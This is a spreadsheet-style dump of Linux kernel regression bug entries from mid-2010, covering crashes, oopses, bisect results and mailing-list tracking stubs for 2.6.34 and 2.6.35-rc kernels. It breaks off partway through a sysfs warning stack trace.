  <si>
    <t>Caught 64-bit read from uninitialized memory in memtype_rb_augment_cb</t>
  </si>
  <si>
    <t>2010-06-01 18:08 UTC</t>
  </si>
  <si>
    <t>2010-10-28 18:42 UTC</t>
  </si>
  <si>
    <t>Created attachment 26596 [details] dmesg portion with the call stack of the bug Slacwkare 13.1 64bits 2.6.25-rc1 vanilla Athlon 64 3000 Acer Aspire 1511Lmi laptop Since 2.6.35-rc1 64bits compiled with kmemcheck, I get this one</t>
  </si>
  <si>
    <t>joining a mesh causes kernel fault with rt73</t>
  </si>
  <si>
    <t>2.6.34-generic</t>
  </si>
  <si>
    <t>2010-06-01 20:47 UTC</t>
  </si>
  <si>
    <t>Christian Mehlis</t>
  </si>
  <si>
    <t>2010-08-23 14:55 UTC</t>
  </si>
  <si>
    <t>Created attachment 26604 [details] kernel.log if two mesh devices merging into one mesh, the rt73 module fails, see attachment</t>
  </si>
  <si>
    <t>Radeon KMS does not start after merge of the new PM-Code</t>
  </si>
  <si>
    <t>2010-06-02 07:47 UTC</t>
  </si>
  <si>
    <t>2010-06-09 09:04 UTC</t>
  </si>
  <si>
    <t>Created attachment 26611 [details] gitbisectresult Using kernels after 2.6.34 with Radeon KMS does not work. Whenever the radeon modeule becomes active the screen goes black with vertical dottet lines. Disabling modeset lets the kernel start. KMS worked with the old code okay on this machine. Its an latop from Fujitsu-Siemens with an x700 Mobility PCIE. I tried an bisect run, bisect log said that ce8a3eb20c4cb7d9e0c33e7560070688cd9066fc is the first bad commit. I tried to revert it ontop of 2.6.35-rc1, the vertical dotted lines disappeared, however system hangs forever with an black screen. I attach bisect-log. If more Information is needed please tell me so.</t>
  </si>
  <si>
    <t>hostap_pci: infinite registered netdevice wifi0</t>
  </si>
  <si>
    <t>2010-06-02 20:55 UTC</t>
  </si>
  <si>
    <t>Petr Pisar</t>
  </si>
  <si>
    <t>2010-08-02 18:25 UTC</t>
  </si>
  <si>
    <t>Hardware: PCI 802.11b network card ZCOMAX XI-626 based on Intersil Prism 2.5 chipset Driver: hostap_pci Architecture: i586 (Pentium TSC), i686 (AMD Thunderbid) Loading hostap_pci module on 2.6.34 kernel causes kernel infinite loop. Latest known working kernel is 2.6.32.14 (more precisely where the module can be loaded). Transcription of kernel messages follows (text in brackets is abbreviated: # modprobe hostap_pci lib80211: common routine for IEEE802.11 drivers ACPI: PCI Interrupt Link [...] enabled at IRQ 10 hostap_pci: [PCI ... -&gt; IRQ 10] hostap_pci: registered netdevice wifi0 net_ratelimit: 609587 callbacks suppressed And the last message repeats ad infinitum (with different but similar number of callbacks). I'm pretty sure it's not a user space problem because I tested it with init process being /bin/bash without any other daemons or init scripts.</t>
  </si>
  <si>
    <t>Oops: 0000 [#1] SMP, unable to handle kernel NULL pointer dereference at (null)</t>
  </si>
  <si>
    <t>2010-06-04 09:25 UTC</t>
  </si>
  <si>
    <t>2010-06-27 22:28 UTC</t>
  </si>
  <si>
    <t>Created attachment 26647 [details] 2.6.35-rc1 kernel log It happens randomly, almost a week I used 2.6.35-rc1 and don't have any problems. But since last day it happened twice. I attached kernel log, please inform me if I can help in investigation.</t>
  </si>
  <si>
    <t>Boot freeze on HP Compaq nx6325 (RS482) with Radeon KMS</t>
  </si>
  <si>
    <t>2010-06-04 21:14 UTC</t>
  </si>
  <si>
    <t>2010-06-21 18:08 UTC</t>
  </si>
  <si>
    <t>When I start up my laptop HP Compaq nx6325 with integrated RS482 and have Radeon KMS enabled the laptop just freezes when it usually would switch to the right resolution. All worked fine in kernel version 2.6.24. I bisected the commits and the one that was problematic is: ce8f53709bf440100cb9d31b1303291551cf517f drm/radeon/kms/pm: rework power management</t>
  </si>
  <si>
    <t>kernel BUG at fs/btrfs/extent-tree.c:4363 (btrfs_free_tree_block)</t>
  </si>
  <si>
    <t>2010-06-05 18:53 UTC</t>
  </si>
  <si>
    <t>2010-06-27 22:30 UTC</t>
  </si>
  <si>
    <t>When running "find /", where / and /home are both btrfs filesystems, it segfaults, and the BUG occurs. A git bisect has shown that the bug is introduced in commit f0486c68e4bd9a06a5904d3eeb3a0d73a83befb8, which is pretty much the commit that introduced this function. The end-result is that everything that attempts to perform any I/O that touches the disk just hangs. Attached is the relevant snippet from my kern.log containing the stack trace.</t>
  </si>
  <si>
    <t>PCMCIA regression</t>
  </si>
  <si>
    <t>2010-06-06 06:16 UTC</t>
  </si>
  <si>
    <t>2010-06-21 18:12 UTC</t>
  </si>
  <si>
    <t>Subject : PCMCIA regression Submitter : Mikulas Patocka &lt;mpatocka@redhat.com&gt; Date : 2010-05-25 20:25 Message-ID : Pine.LNX.4.64.1005251619020.12278@hs20-bc2-1.build.redhat.com References : http://marc.info/?l=linux-kernel&amp;m=127481913909672&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Unable to boot unless "notsc" or "clocksource=hpet", or acpi_pad disabling the TSC</t>
  </si>
  <si>
    <t>2.6.35-rc[1,2]</t>
  </si>
  <si>
    <t>2010-06-07 13:11 UTC</t>
  </si>
  <si>
    <t>Tom Gundersen</t>
  </si>
  <si>
    <t>It looks like commit 0dc698b93f3eecdda43b22232131324eb41e510c causes init to segfault at boot time on one of my computers. Reverting 0dc698b9 on top of 2.6.35-rc2 solves the problem. FWIW, the problem does not occur on my laptop (ThinkPad X60) with (mostly) the same software and the same kernel. The output on failed boot (2.6.35-rc2) is: INIT: version 2.86 booting init[1]: segfult at ffffffff8100896d ip ffffffff8100896d sp 00007fff734b04c8 error 15 init[1]: segfult at ffffffff8100896d ip ffffffff8100896d sp 00007fff734b04c8 error 15 Kernel panic - not syncing: Attempted to kill init! Pid: 1, comm: init Not tainted 2.6.35-rc2-TEG #93 Call Trace: [ffffffff814d1a74] panic+0x86/0xf4 [ffffffff8108d5b4] ? perf_event_exit_task+0x27/0x112 [ffffffff8103d118] do_exit+0x6d/0x687 [ffffffff8103d9a5] do_group_exit+0x70/0x98 [ffffffff8104a1e4] get_signal_to_deliver+0x330/0x34e [ffffffff810014da] do_signal+0x6d/0x65b [ffffffff814d1b1e] ? printk+0x3c/0x3e [ffffffff8100896d] ? rdtsc_barrier+0x0/0xc [ffffffff814d1b1e] ? printk+0x3c/0x3e [ffffffff81020811] ? __bad_area_nosemaphore+0x179/0x1a3 [ffffffff8100896d] ? rdtsc_barrier+0x0/0xc [ffffffff81001b03] do_notify_resume+0x27/0x47 [ffffffff814d3a9a] retint_signal+0x3d/0x83 [ffffffff8100896d] ? rdtsc_barrier+0x0/0xc [drm:drm_fb_helper_panic] *ERROR* panic occurred, switching back to text console</t>
  </si>
  <si>
    <t>ksoftirq hogs the CPU</t>
  </si>
  <si>
    <t>2010-06-07 15:17 UTC</t>
  </si>
  <si>
    <t>2010-07-09 22:28 UTC</t>
  </si>
  <si>
    <t>Corey Minyard</t>
  </si>
  <si>
    <t>Hello, after upgrading from kernel 2.6.32 to kernel 2.6.34, I can see two ksoftirqd tasks constantly eating around ~20% CPU on a HP Proliant DL320G6. Some more information: - Downgrading to 2.6.32 fixes it - HP Proliant DL320G4 and HP Proliant DL320G5 are not affected, same is true for around eight other systems using different mainboards/CPUs. - We've switched to CONFIG_NO_HZ (tickless) in the 2.6.32 -&gt; 2.6.34 upgrade - Ubuntu report of the same issue with 2.6.34: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/575392 Here's the output from /proc/interrupts: CPU0 CPU1 CPU2 CPU3 CPU4 CPU5 CPU6 CPU7 0: 44 0 0 396123 0 0 0 0 IO-APIC-edge timer 1: 0 0 0 2 0 0 0 0 IO-APIC-edge i8042 8: 0 0 0 596 0 0 0 0 IO-APIC-edge rtc0 9: 0 0 0 0 0 0 0 0 IO-APIC-fasteoi acpi 12: 0 0 0 3 0 0 0 0 IO-APIC-edge i8042 20: 0 0 0 0 0 0 0 0 IO-APIC-fasteoi uhci_hcd:usb1, ehci_hcd:usb4, uhci_hcd:usb6 21: 0 0 7998 0 0 0 0 0 IO-APIC-fasteoi ipmi_si 22: 0 38 0 0 0 0 0 0 IO-APIC-fasteoi ehci_hcd:usb2, uhci_hcd:usb5, uhci_hcd:usb8, uhci_hcd:usb9 23: 0 0 48 0 0 0 0 0 IO-APIC-fasteoi uhci_hcd:usb3, uhci_hcd:usb7 55: 18743 0 0 0 0 0 0 0 PCI-MSI-edge cciss0 57: 0 0 0 0 0 0 0 0 PCI-MSI-edge eth1-rx-0 58: 0 0 0 0 0 0 0 0 PCI-MSI-edge eth1-tx-0 59: 0 0 0 0 0 0 0 0 PCI-MSI-edge eth1 60: 0 0 0 0 0 3627 0 0 PCI-MSI-edge eth0 61: 0 0 0 0 0 0 51 0 PCI-MSI-edge eth2 NMI: 0 0 0 0 0 0 0 0 Non-maskable interrupts LOC: 143033 245518 231358 18221 69809 33569 48544 17431 Local timer interrupts SPU: 0 0 0 0 0 0 0 0 Spurious interrupts PMI: 0 0 0 0 0 0 0 0 Performance monitoring interrupts PND: 0 0 0 0 0 0 0 0 Performance pending work RES: 258 165 73 63 114 246 150 75 Rescheduling interrupts CAL: 86 150 149 104 138 133 132 136 Function call interrupts TLB: 113 62 76 62 82 124 127 130 TLB shootdowns TRM: 0 0 0 0 0 0 0 0 Thermal event interrupts THR: 0 0 0 0 0 0 0 0 Threshold APIC interrupts MCE: 0 0 0 0 0 0 0 0 Machine check exceptions MCP: 5 5 5 5 5 5 5 5 Machine check polls ERR: 7 MIS: 0 The counter for "IO-APIC-edge timer" on CPU3 is constantly increasing by around ~500-1000 per second. Is there any issue like this known? Output from powertop: Top causes for wakeups: 37.0% (607.0) &lt;kernel core&gt; : hrtimer_start_range_ns (tick_sched_timer) 19.0% (312.3) kipmi0 : schedule_timeout_interruptible (process_timeout) 15.3% (251.7) &lt;interrupt&gt; : extra timer interrupt 15.2% (250.3) &lt;kernel core&gt; : add_timer (smi_timeout) 5.4% ( 88.7) &lt;kernel core&gt; : hrtimer_start (tick_sched_timer) 5.1% ( 83.7) squid : sys_epoll_wait (process_timeout) 0.6% ( 10.0) &lt;kernel core&gt; : ipmi_timeout (ipmi_timeout) I'll try 2.6.33.5 next as I have binary packages for it on file. Thanks in advance, Thomas</t>
  </si>
  <si>
    <t>Lagging sound while closing/opening lid.</t>
  </si>
  <si>
    <t>2.6.32.11+drm33.2-eeepc-1v1.0.4</t>
  </si>
  <si>
    <t>2010-06-07 19:46 UTC</t>
  </si>
  <si>
    <t>San</t>
  </si>
  <si>
    <t>2010-12-19 13:07 UTC</t>
  </si>
  <si>
    <t>Hi! It is my first bug report so i ask you for being pacient. Sorry, by the way, for my pour english. I am trying to compile my own kernel since one from Ubuntu is not good enought for me. One of the main problems was lagging sound while closing the lid. Now i found what causes the problem: DRM_I915_KMS (or DRM_KMS_HELPER) Tried to add some debugging codes to kernel but did not found any useful informations in logs. Do not know what to do to report anything useful... Give me two minutes to add attachements. Regards!</t>
  </si>
  <si>
    <t>2.6.35-rc2</t>
  </si>
  <si>
    <t>No Sound with 2.6.34.x Kernel with my Audio-Chip</t>
  </si>
  <si>
    <t>2.6.34-0.slh.7-sidux-686</t>
  </si>
  <si>
    <t>2010-06-08 11:51 UTC</t>
  </si>
  <si>
    <t>Ch: Hanisch</t>
  </si>
  <si>
    <t>2010-06-27 22:31 UTC</t>
  </si>
  <si>
    <t>My Audio-Chip is: 00:1b.0 Audio device [0403]: Intel Corporation 82801H (ICH8 Family) HD Audio Controller [8086:284b] (rev 03) I have no Sound with Kernel 2.6.34.x Part of dmesg: ... [ 13.965397] HDA Intel 0000:00:1b.0: PCI INT A -&gt; GSI 22 (level, low) -&gt; IRQ 22 [ 13.965456] alloc irq_desc for 31 on node -1 [ 13.965458] alloc kstat_irqs on node -1 [ 13.965471] HDA Intel 0000:00:1b.0: irq 31 for MSI/MSI-X [ 13.965508] HDA Intel 0000:00:1b.0: setting latency timer to 64 [ 14.008135] hda_codec: ALC268: BIOS auto-probing. [ 14.010459] BUG: unable to handle kernel NULL pointer dereference at (null) [ 14.010891] IP: [&lt;f9f04ec0&gt;] alc_build_controls+0xf0/0x450 [snd_hda_codec_realtek] [ 14.011005] *pde = 00000000 [ 14.011005] Oops: 0000 [#1] PREEMPT SMP [ 14.011005] last sysfs file: /sys/module/snd_hda_codec/initstate [ 14.011005] Modules linked in: snd_hda_codec_realtek snd_hda_intel(+) snd_hda_codec snd_hwdep snd_pcm_oss snd_mixer_oss snd_pcm arc4 ecb snd_seq_dummy snd_seq_oss gspca_gl860 snd_seq_midi iwl3945 snd_rawmidi iwlcore gspca_main snd_seq_midi_event snd_seq btusb videodev snd_timer v4l1_compat joydev bluetooth snd_seq_device nvidia(P) i2c_i801 mac80211 snd soundcore rtc_cmos video rtc_core serio_raw tpm_tis intel_agp tpm i2c_core output pcspkr rtc_lib psmouse tpm_bios cfg80211 snd_page_alloc evdev processor ac battery button rfkill ext3 jbd mbcache usbhid hid dm_mod sg sd_mod sr_mod cdrom ata_generic pata_acpi usb_storage ahci ata_piix uhci_hcd thermal libata ehci_hcd scsi_mod r8169 mii usbcore nls_base [last unloaded: scsi_wait_scan] [ 14.011005] [ 14.011005] Pid: 909, comm: modprobe Tainted: P 2.6.34-0.slh.7-sidux-686 #1 MIM2280 /MIM2280 [ 14.011005] EIP: 0060:[&lt;f9f04ec0&gt;] EFLAGS: 00010246 CPU: 0 [ 14.011005] EIP is at alc_build_controls+0xf0/0x450 [snd_hda_codec_realtek] [ 14.011005] EAX: 00000000 EBX: f705e800 ECX: 00000000 EDX: 00000002 [ 14.011005] ESI: f6656000 EDI: 00000000 EBP: f6959880 ESP: f6b53dd4 [ 14.011005] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 14.011005] Process modprobe (pid: 909, ti=f6b52000 task=f69d6f70 task.ti=f6b52000) [ 14.011005] Stack: [ 14.011005] 0000b000 00000000 f705e800 f6656000 00000001 f6604600 f9f04309 00000096 [ 14.011005] &lt;0&gt; f6656000 f708592c 00000003 f6604600 f87d657d f6656000 f87d8447 f708592c [ 14.011005] &lt;0&gt; 00000003 f6604600 00000000 00000004 00000003 f883caa5 f6655044 00000050 [ 14.011005] Call Trace: [ 14.011005] [&lt;f9f04309&gt;] ? alc_init+0x59/0x340 [snd_hda_codec_realtek] [ 14.011005] [&lt;f87d657d&gt;] ? snd_hda_codec_build_controls+0x3d/0x50 [snd_hda_codec] [ 14.011005] [&lt;f87d8447&gt;] ? snd_hda_build_controls+0x27/0x80 [snd_hda_codec] [ 14.011005] [&lt;f883caa5&gt;] ? azx_probe+0x917/0x9b6 [snd_hda_intel] [ 14.011005] [&lt;f883bfa0&gt;] ? azx_send_cmd+0x0/0x180 [snd_hda_intel] [ 14.011005] [&lt;f883bd60&gt;] ? azx_get_response+0x0/0x240 [snd_hda_intel] [ 14.011005] [&lt;f883b350&gt;] ? azx_attach_pcm_stream+0x0/0x1b0 [snd_hda_intel] [ 14.011005] [&lt;f883af80&gt;] ? azx_bus_reset+0x0/0x60 [snd_hda_intel] [ 14.011005] [&lt;f883adc0&gt;] ? azx_power_notify+0x0/0x90 [snd_hda_intel] [ 14.011005] [&lt;c027cadb&gt;] ? local_pci_probe+0xb/0x10 [ 14.011005] [&lt;c027dab1&gt;] ? pci_device_probe+0x61/0x80 [ 14.011005] [&lt;c02f9af7&gt;] ? driver_probe_device+0x77/0x170 [ 14.011005] [&lt;c027cc10&gt;] ? pci_match_device+0xa0/0xc0 [ 14.011005] [&lt;c02f9c69&gt;] ? __driver_attach+0x79/0x80 [ 14.011005] [&lt;c02f9bf0&gt;] ? __driver_attach+0x0/0x80 [ 14.011005] [&lt;c02f93e2&gt;] ? bus_for_each_dev+0x52/0x80 [ 14.011005] [&lt;c02f9996&gt;] ? driver_attach+0x16/0x20 [ 14.011005] [&lt;c02f9bf0&gt;] ? __driver_attach+0x0/0x80 [ 14.011005] [&lt;c02f8d3b&gt;] ? bus_add_driver+0xab/0x230 [ 14.011005] [&lt;c027d9f0&gt;] ? pci_device_remove+0x0/0x40 [ 14.011005] [&lt;c02f9f03&gt;] ? driver_register+0x63/0x120 [ 14.011005] [&lt;f87b5000&gt;] ? alsa_card_azx_init+0x0/0x14 [snd_hda_intel] [ 14.011005] [&lt;c027dcdd&gt;] ? __pci_register_driver+0x3d/0xb0 [ 14.011005] [&lt;c010112f&gt;] ? do_one_initcall+0x2f/0x190 [ 14.011005] [&lt;c01645b4&gt;] ? sys_init_module+0xb4/0x220 [ 14.011005] [&lt;c01c561d&gt;] ? sys_close+0x6d/0xc0 [ 14.011005] [&lt;c03f1df5&gt;] ? syscall_call+0x7/0xb [ 14.011005] Code: 00 10 74 5b ba 4b d4 f0 f9 89 f0 e8 bb 2e 8d fe 85 c0 89 c5 0f 84 98 00 00 00 8b 45 48 85 c0 0f 84 a3 00 00 00 31 c9 31 ff eb 22 &lt;0f&gt; b7 04 48 89 ea 89 04 24 89 f0 e8 20 06 8d fe 85 c0 0f 88 26 [ 14.011005] EIP: [&lt;f9f04ec0&gt;] alc_build_controls+0xf0/0x450 [snd_hda_codec_realtek] SS:ESP 0068:f6b53dd4 [ 14.011005] CR2: 0000000000000000 [ 14.309715] ---[ end trace 6ab975fd0c634b8a ]--- The fully dmesg on http://paste.debian.net/76600/ Look on Thread at http://sidux.com/index.php?name=PNphpBB2&amp;file=viewtopic&amp;p=160011#160011 Thanks Ch. Hanisch</t>
  </si>
  <si>
    <t>2.6.35 Radeon KMS power management regression?</t>
  </si>
  <si>
    <t>2.6.35-rc</t>
  </si>
  <si>
    <t>2010-06-08 19:09 UTC</t>
  </si>
  <si>
    <t>2010-07-08 22:40 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35 Radeon KMS power management regression? Submitter : Nigel Cunningham &lt;ncunningham@crca.org.au&gt; Date : 2010-06-01 6:23 Message-ID : 4C04A767.8000209@crca.org.au References : http://marc.info/?l=linux-kernel&amp;m=127537343722290&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.35-rc1 regression] sysfs: cannot create duplicate filename ... XVR-600 related?</t>
  </si>
  <si>
    <t>2010-06-08 19:15 UTC</t>
  </si>
  <si>
    <t>2010-06-14 14:19 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.35-rc1 regression] sysfs: cannot create duplicate filename ... XVR-600 related? Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2010-06-01 19:57 Message-ID : 19461.26166.427857.612983@pilspetsen.it.uu.se References : http://marc.info/?l=linux-kernel&amp;m=127542227511925&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.35-rc1 Regression] i915: Commit cfecde causes VGA to stay off</t>
  </si>
  <si>
    <t>2010-06-08 19:49 UTC</t>
  </si>
  <si>
    <t>2010-06-09 08:41 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.35-rc1 Regression] i915: Commit cfecde causes VGA to stay off Submitter : David John &lt;davidjon@xenontk.org&gt; Date : 2010-06-02 12:52 Message-ID : 4C065423.3000202@xenontk.org References : http://marc.info/?l=linux-kernel&amp;m=127548313828613&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Complain from preemptive debug</t>
  </si>
  <si>
    <t>2010-06-09 09:19 UTC</t>
  </si>
  <si>
    <t>2010-07-09 20:31 UTC</t>
  </si>
  <si>
    <t>Subject : [FIXED] 2.6.35-rc1: Call trace: BUG: using smp_processor_id() in preemptible [00000000] Submitter : Sedat Dilek &lt;sedat.dilek@googlemail.com&gt; Date : 2010-05-31 10:10 Message-ID : AANLkTilTnAAZIizKinYsxFkNTkrmPqk6XJJuUjjhJ7EP@mail.gmail.com References : http://lkml.org/lkml/2010/5/31/77 Handled-By : Dmitry Monakhov &lt;dmonakhov@openvz.org&gt; Patch : http://www.spinics.net/lists/cpufreq/msg01631.html This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>After uncompressing the kernel, at boot time, the server hangs.</t>
  </si>
  <si>
    <t>2.6.35-rc1 2.6.35-rc2 2.6.35-rc3 2.6.35-rc4 2.6.35-rc5 2.6.35.1</t>
  </si>
  <si>
    <t>2010-06-09 23:25 UTC</t>
  </si>
  <si>
    <t>2010-08-30 17:05 UTC</t>
  </si>
  <si>
    <t>After uncompresing the kernel, since 2.6.35rc1 the server hangs. Server is an old Dual P3 550MHZ with 1GB memory. I'm starting a bisection.</t>
  </si>
  <si>
    <t>2.6.35-rc2 : OOPS with LTP memcg regression test run.</t>
  </si>
  <si>
    <t>2010-06-10 20:00 UTC</t>
  </si>
  <si>
    <t>2010-06-21 18:45 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc2 : OOPS with LTP memcg regression test run. Submitter : Sachin Sant &lt;sachinp@in.ibm.com&gt; Date : 2010-06-06 15:18 Message-ID : 4C0BB98E.9030101@in.ibm.com References : http://marc.info/?l=linux-kernel&amp;m=127583683912607&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>radeon regression with 2.6.35-rc2-00001-g386f40c: black screen after resume</t>
  </si>
  <si>
    <t>2010-06-11 10:59 UTC</t>
  </si>
  <si>
    <t>2010-07-08 22:47 UTC</t>
  </si>
  <si>
    <t>With the aforementioned kernel version, after a resume the screen stays black. Everything seems responding (wifi led blinking, reboot, ...). After reading the logs between this kernel and 2.6.35-rc1-00194-gaef4b9a (known good), i think the problem is with this patch drm/radeon/kms: make sure display hw is disabled when suspending After I did apply the attached patch, the resume seems OK. Don't know if it's the good solution...</t>
  </si>
  <si>
    <t>Container, X86-64, i386, iptables rule</t>
  </si>
  <si>
    <t>2.6.35-rc1,2,3</t>
  </si>
  <si>
    <t>2010-06-12 04:17 UTC</t>
  </si>
  <si>
    <t>Jean-Marc Pigeon</t>
  </si>
  <si>
    <t>2010-10-03 10:08 UTC</t>
  </si>
  <si>
    <t>IS WORKING with 2.6.34, problem still present in 2.6.35-rc2 container network is down because of iptables, this ONLY if container is i386 (x86_64 arch container are working no trouble (strange?)). host is 2.6.35-rc1 (fc13) container devices are veth (with a bridge at host level). All container in i386 arch boot correctly, but network is unable to route packet (ping is not responding). Problem is related to iptables activation, adding a SINGLE RULE (within container iptables) make the trouble. here the iptables example *filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] :std - [0:0] #----------------------------------------------------------- #standard rules #-A FORWARD -j std #troubled Sequence ! -A INPUT -j std #no packet reach if using that sequence -A std -j ACCEPT # #correct No trouble -A INPUT -j ACCEPT #packet are accepted. #----------------------------------------------------------- COMMIT I didn't try using a host with an i386 arch 2.6.35-rc1 kernel, only host x86_64 with a mix of different distribution (fc10 -&gt; fc12) and arch as containers.</t>
  </si>
  <si>
    <t>2.6.35-rc2-git1 - WARNING: at net/wireless/mlme.c:341 cfg80211_send_assoc_timeout+0x107/0x11e [cfg80211]()</t>
  </si>
  <si>
    <t>2010-06-13 19:23 UTC</t>
  </si>
  <si>
    <t>2010-06-27 22:34 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc2-git1 - WARNING: at net/wireless/mlme.c:341 cfg80211_send_assoc_timeout+0x107/0x11e [cfg80211]() Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2010-06-07 19:06 Message-ID : AANLkTinmZh9GnrZLzOGi5Q_xHbky8cKdHAkOnsIA6_dZ@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127593758817428&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BUG on 2.6.35-rc2] sysfs: cannot create duplicate filename '/devices/pci0000:00/0000:00:11.0/0000:02:03.0/slot'</t>
  </si>
  <si>
    <t>2010-06-13 19:26 UTC</t>
  </si>
  <si>
    <t>2010-07-09 20:54 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG on 2.6.35-rc2] sysfs: cannot create duplicate filename '/devices/pci0000:00/0000:00:11.0/0000:02:03.0/slot' Submitter : Ryan Wang &lt;openspace.wang@gmail.com&gt; Date : 2010-06-07 0:23 Message-ID : AANLkTincwMZPnYW3S4uz4k2GOn52RpgBIBRfzyD010Yo@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127587022219378&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Running make install over sshfs is painful now</t>
  </si>
  <si>
    <t>2010-06-13 19:44 UTC</t>
  </si>
  <si>
    <t>2010-07-08 23:41 UTC</t>
  </si>
  <si>
    <t>Subject : Running make install over sshfs is painful now Submitter : Dmitry Torokhov &lt;dmitry.torokhov@gmail.com&gt; Date : 2010-06-07 6:53 Message-ID : 20100607065324.GA25590@core.coreip.homeip.net References : http://marc.info/?l=linux-kernel&amp;m=127589362011138&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.35-rc2-git1 - include/linux/cgroup.h:534 invoked rcu_dereference_check() without protection!</t>
  </si>
  <si>
    <t>2.6.35-rc2-git1</t>
  </si>
  <si>
    <t>2010-06-13 19:53 UTC</t>
  </si>
  <si>
    <t>2010-07-09 21:30 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc2-git1 - include/linux/cgroup.h:534 invoked rcu_dereference_check() without protection! Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2010-06-07 18:14 Message-ID : AANLkTin2pPqOUx--9fIX3BH3e-cU6oCRufijcx_4ozx5@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127593447812015&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.35-rc3 regression linked to 597a264b1a9c7e36d1728f677c66c5c1f7e3b837</t>
  </si>
  <si>
    <t>2.6.35-rc3</t>
  </si>
  <si>
    <t>2010-06-14 12:27 UTC</t>
  </si>
  <si>
    <t>2010-06-14 14:21 UTC</t>
  </si>
  <si>
    <t>I am using qemu with both tap and slirp (userspace) networking. This works fine under 2.6.35-rc2 but breaks under 2.6.35-rc3: ssh over slirp stops working sometimes right away and sometimes after a bit of use. Git bisect gave me this commit: 597a264b1a9c7e36d1728f677c66c5c1f7e3b837. Reverting 597a264b1a9c7e36d1728f677c66c5c1f7e3b837 fixes the issue for me.</t>
  </si>
  <si>
    <t>acpi: freeing invalid memtype bf799000-bf79a000</t>
  </si>
  <si>
    <t>2010-06-14 14:30 UTC</t>
  </si>
  <si>
    <t>Subject : acpi: freeing invalid memtype bf799000-bf79a000 Submitter : Marcin Slusarz &lt;marcin.slusarz@gmail.com&gt; Date : 2010-06-09 20:09 Message-ID : 20100609200910.GA2876@joi.lan References : http://marc.info/?l=linux-kernel&amp;m=127611427029914&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Some NFS/RPC file transfers fail and hang automounting</t>
  </si>
  <si>
    <t>2.6.33.5-112.fc13.x86_64</t>
  </si>
  <si>
    <t>2010-06-15 11:48 UTC</t>
  </si>
  <si>
    <t>Philippe Dax</t>
  </si>
  <si>
    <t>2010-07-23 23:17 UTC</t>
  </si>
  <si>
    <t>Given a file "foo" of 50Mb on a remote machine "remote". The command &lt;localmachine $&gt; cp /remote_mount_point/foo bar never finishes, and bar has a size lesser than foo. and the automounting of the local machine is hanged. The error message in /var/log/messages is: kernel: Callback slot table overflowed If foo is lesser than 10Mb, the problem does'nt occur. After several tries with the source of 50Mb, the different sizes of the target file "bar" are random. This incident occurs with: sunrpc.tcp_slot_table_entries = 16 but after tunning this parameter, all is fine with: sunrpc.tcp_slot_table_entries = 32</t>
  </si>
  <si>
    <t>sysfs: cannot create duplicate filename '/class/net/bnep0'</t>
  </si>
  <si>
    <t>2010-06-15 14:55 UTC</t>
  </si>
  <si>
    <t>Janusz Krzysztofik</t>
  </si>
  <si>
    <t>2010-08-01 21:37 UTC</t>
  </si>
  <si>
    <t>After a PAN connecton breaks, sysfs entry seems not cleaned up so it's no longer possible to create a new connection. [ 361.930000] ------------[ cut here ]------------ [ 361.950000] WARNING: at fs/sysfs/dir.c:451 sysfs_add_one+0x68/0x94() [ 361.950000] sysfs: cannot create duplicate filename '/class/net/bnep0' [ 361.960000] Modules linked in: [ 361.980000] [&lt;c00286d8&gt;] (unwind_backtrace+0x0/0x164) from [&lt;c003a554&gt;] (warn_slowpath_common+0x48/0x60) [ 362.000000] [&lt;c003a554&gt;] (warn_slowpath_common+0x48/0x60) from [&lt;c003a600&gt;] (warn_slowpath_fmt+0x30/0x40) [ 362.010000] [&lt;c003a600&gt;] (warn_slowpath_fmt+0x30/0x40) from [&lt;c00cf958&gt;] (sysfs_add_one+0x68/0x94) [ 362.030000] [&lt;c00cf958&gt;] (sysfs_add_one+0x68/0x94) from [&lt;c00d0b94&gt;] (sysfs_do_create_link+0x11c/0x1c8) [ 362.050000] [&lt;c00d0b94&gt;] (sysfs_do_create_link+0x11c/0x1c8) from [&lt;c0175268&gt;] (device_add+0x1e8/0x4ec) [ 362.060000] [&lt;c0175268&gt;] (device_add+0x1e8/0x4ec) from [&lt;c022f6e4&gt;] (register_netdevice+0x18c/0x28c) [ 362.080000] [&lt;c022f6e4&gt;] (register_netdevice+0x18c/0x28c) from [&lt;c022f824&gt;] (register_netdev+0x40/0x54) [ 362.100000] [&lt;c022f824&gt;] 